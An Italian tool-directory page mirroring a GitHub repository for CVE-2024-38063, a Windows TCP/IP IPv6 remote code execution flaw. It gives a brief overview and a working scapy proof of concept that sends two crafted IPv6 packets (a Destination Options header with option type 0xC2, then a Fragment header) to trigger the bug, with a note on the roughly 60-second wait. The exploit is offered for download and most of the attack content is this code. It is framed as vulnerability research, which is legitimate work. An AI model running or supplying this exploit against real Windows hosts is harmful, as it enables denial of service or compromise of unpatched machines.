Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-38063 | Kitploit
Strumenti/GitHubGitHub/patchpoint/cve-2024-38063
Analisi delle VulnerabilitàExploitSicurezza di RetePenetration TestingSviluppo PayloadBinary Exploitation
GitHubpatchpoint/cve-2024-38063

CVE-2024-38063

Vedi Repository
2031 anno faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-38063

Panoramica

Nell'agosto 2024, Microsoft ha rilasciato una patch per una vulnerabilità di esecuzione remota di codice (RCE) nel TCP/IP di Windows. Alcuni ricercatori hanno già pubblicato Proof of Concept (PoC) per questa vulnerabilità e, più o meno nello stesso periodo, i ricercatori di PatchPoint hanno anche completato la loro analisi e riproduzione del problema. A causa della diffusione di informazioni errate su varie piattaforme, incluso Twitter, sembra che i punti critici necessari per attivare questa vulnerabilità siano stati fraintesi. Contrariamente a queste imprecisioni, abbiamo deciso di rilasciare un PoC che dimostra come questa vulnerabilità possa essere attivata con la trasmissione di soli due pacchetti.; In realtà, non è necessario un grande numero di pacchetti per attivare questa vulnerabilità.

PoC

root@kitploit:~
from scapy.all import *
IPAddr  = '' # fe80::XXXX:XXXX:XXXX:XXXX
MACAddr = '' # XX:XX:XX:XX:XX:XX
ExtHdrDestOpt  = Ether(dst=MACAddr) / IPv6(fl=1, dst=IPAddr) / IPv6ExtHdrDestOpt(options=[PadN(otype=0xC2)])
ExtHdrFragment = Ether(dst=MACAddr) / IPv6(fl=1, dst=IPAddr) / IPv6ExtHdrFragment()
sendp([ExtHdrDestOpt, ExtHdrFragment], verbose=False)

PCAP

pcap

DEMO

CVE-2024-38063_Demo.mp4

※ Per attivare la vulnerabilità, è richiesto un tempo di attesa di circa 60 secondi

Riferimenti

  • https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38063
Scarica lo strumento